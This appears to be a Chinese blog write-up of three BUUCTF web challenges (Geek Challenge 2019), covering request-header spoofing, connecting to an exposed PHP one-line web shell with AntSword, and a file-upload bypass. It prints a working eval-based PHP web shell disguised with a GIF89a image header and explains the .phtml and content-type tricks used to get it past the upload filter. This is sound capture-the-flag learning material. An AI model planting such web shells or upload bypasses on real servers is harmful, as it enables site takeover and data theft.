BUUCTF web类(2)

1,[极客大挑战 2019]Http

进入页面,查看页面源码,找到一个Secret.php页面就没有其他信息了,进去看看。

给了个提示,抓包看看。

提示我们的报文要来自于https://Sycsecret.buuoj.cn,那就插入请求源,得到第二个提示。

要我们使用“Syclover”浏览器访问,那么就修改一下报文。

得到第三个提示,要求只能本地访问,那么添加来源ip为127.0.0.1

得到flag

2,[极客大挑战 2019]Knife

进入页面,一个大大的一句话木马就在页面上。。。。真是白给的shell,蚁剑直接连。

配置几个基础信息,测试链接,成功。

在网站根目录下找到flag,拿到shell后这个站点基本可以随便搞了。

3,[极客大挑战 2019]Upload

进入页面,这次要自己上传木马,传个免杀马上去。

看来php后缀的还不行,抓包修改后缀,或者直接用图片马,但是要知道木马的位置,将php改为phtml,文件类型在报文中修改为image/jpeg,且向木马中添加一个图片头GIF89a,此时用一句话木马会被检测出<?,所以我们使用script来绕过'<?',具体木马源码如下:

GIF89a
<script language="php">@eval($_POST['pass']);</script>

上传通过,接下来就是寻找上传目录了,尝试看下有没有upload目录,发现有在其中找到上传的木马,如果不知道上传的马在哪,可以尝试下用目录扫描工具扫描一下。

 

上蚁剑连一下,链接成功。

在网站根目录下找到flag。 

 

 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值